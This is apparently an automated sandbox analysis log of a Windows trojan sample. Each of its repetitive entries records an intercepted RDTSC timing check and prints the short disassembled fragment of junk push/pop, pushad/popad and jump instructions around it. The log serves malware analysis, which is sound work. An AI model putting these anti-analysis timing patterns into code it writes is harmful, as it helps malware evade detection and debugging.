Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7EF50 second address: B7EF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7EF54 second address: B7EF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FABC9471C32h 0x00000011 jmp 00007FABC9471C2Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7F276 second address: B7F29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FABC90CD761h 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7F29D second address: B7F2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7F2A1 second address: B7F2AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABC90CD756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7F2AB second address: B7F2C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C30h 0x00000009 ja 00007FABC9471C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7F3EC second address: B7F404 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC90CD756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FABC90CD75Ch 0x00000012 ja 00007FABC90CD756h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B7F404 second address: B7F42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FABC9471C30h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FABC9471C33h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B82F41 second address: B82F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B82F47 second address: B82F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B82F4C second address: B82F65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jmp 00007FABC90CD75Ch 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B82F65 second address: B82F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B830F2 second address: B830F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B830F6 second address: B830FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B830FC second address: B83117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD765h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B83553 second address: B83585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FABC9471C35h 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FABC9471C2Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B83585 second address: B83597 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jp 00007FABC90CD756h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B83597 second address: B8359B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8AD52 second address: B8AD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD766h 0x00000009 jmp 00007FABC90CD75Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEF401 second address: AEF412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEF412 second address: AEF42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD762h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEF42A second address: AEF43F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FABC9471C2Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEF43F second address: AEF463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC90CD768h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEF463 second address: AEF469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AEF469 second address: AEF480 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FABC90CD75Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B88F99 second address: B88F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B88F9D second address: B88FA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B88FA5 second address: B88FBD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABC9471C28h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FABC9471C26h 0x00000012 jng 00007FABC9471C26h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B88FBD second address: B88FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8A10D second address: B8A12A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FABC9471C32h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8A12A second address: B8A137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FABC90CD756h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8A3FA second address: B8A413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C34h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8A6D1 second address: B8A6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8F816 second address: B8F81A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8F81A second address: B8F82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FABC90CD75Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8F82F second address: B8F86A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FABC9471C34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FABC9471C32h 0x00000012 jmp 00007FABC9471C2Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8E99C second address: B8E9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B8E9A2 second address: B8E9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 js 00007FABC9471C26h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B9BE09 second address: B9BE45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 jng 00007FABC90CD75Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FABC90CD75Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007FABC90CD756h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA1189 second address: BA118D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA118D second address: BA1198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA1198 second address: BA11A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA11A0 second address: BA11A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA11A6 second address: BA11CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FABC9471C31h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FABC9471C2Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA11CF second address: BA11E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FABC90CD75Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA453D second address: BA4541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA4541 second address: BA4580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 jmp 00007FABC90CD766h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jmp 00007FABC90CD762h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA4580 second address: BA458A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FABC9471C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA458A second address: BA459D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jp 00007FABC90CD756h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA459D second address: BA45A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA45A3 second address: BA45AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BA3F97 second address: BA3FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FABC9471C36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB30D5 second address: BB30F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB30F1 second address: BB30F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AED8D9 second address: AED8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AED8DD second address: AED901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FABC9471C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 js 00007FABC9471C34h 0x0000001b push edx 0x0000001c jbe 00007FABC9471C26h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB4D1F second address: BB4D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jno 00007FABC90CD756h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FABC90CD756h 0x0000001b jnp 00007FABC90CD756h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB4D40 second address: BB4D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FABC9471C2Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB4D54 second address: BB4D59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB4EA8 second address: BB4EBD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FABC9471C2Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB4EBD second address: BB4EE2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC90CD756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d jp 00007FABC90CD756h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FABC90CD75Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BB4EE2 second address: BB4EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC20A4 second address: BC20AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC20AA second address: BC20C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FABC9471C2Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC1F54 second address: BC1F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BCA2A5 second address: BCA2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC8E74 second address: BC8E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC915E second address: BC917A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FABC9471C35h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC92B2 second address: BC92CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD760h 0x00000007 jnc 00007FABC90CD756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC9413 second address: BC9419 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC9419 second address: BC9423 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABC90CD771h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BC9556 second address: BC955B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BCE71E second address: BCE730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FABC90CD75Eh 0x0000000a jbe 00007FABC90CD756h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BCE730 second address: BCE735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BCE735 second address: BCE748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BCE8A7 second address: BCE8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push ebx 0x0000000c jmp 00007FABC9471C34h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BD1EC3 second address: BD1ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FABC90CD756h 0x0000000a jnc 00007FABC90CD756h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BE08EA second address: BE08EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BE0727 second address: BE0740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD75Fh 0x00000009 popad 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: BDB27E second address: BDB287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0AAFE second address: C0AB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0AECD second address: C0AED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
